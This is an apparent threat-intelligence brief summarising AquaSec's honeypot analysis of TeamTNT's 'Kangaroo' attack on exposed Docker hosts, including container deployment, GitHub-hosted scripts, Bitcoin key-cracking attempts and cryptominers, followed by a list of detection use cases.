Analyzing TeamTNT Attacks
Category: Threat Actor Activity | Industry: N/A | Level: Tactical | Source: AquaSec
TeamTNT, a threat actor commonly targeting cloud environments, has been analyzed by researchers from AquaSec by studying the threat group's activities through the security team's honeypots. Interestingly the threat group is attempting to compromise environments and utilize computing resources to run Bitcoin encryption solvers. "Breaking the cryptographic encryption is considered 'Mission: Impossible.' If you actually succeed doing that, you potentially have the keys to almost everything that is connected online, which could have a devastating effect on the entire internet." Present-day technology isn't capable of breaking the SECP256K1 encryption used by Bitcoin however, it’s commendable TeamTNT is attempting to take a crack at it. The attack flow used in the deployment of the script is simple and titled "TeamTNT Kangaroo Attack." The attack begins with a scan for misconfigured Docker instances, once an exposed host is identified, the threat actors break in to deploy a vanilla alpine container image. With the image deployed, the threat will bring down their scripts to execute pulling down shell scripts hosted on GitHub. Other attacks observed from TeamTNT include the use of rootkits to conceal their activities, create cronjobs for persistence, scan and move through the network with SSH, and download and execute a variety of scripts. TeamTNT's campaigns have frequently resulted in the deployment of a cryptominer.
- Docker API Abuse & Container Created
Anvilogic Use Cases:
- Publicly exposed Docker API
- New Docker Container
- Git Repository Accessed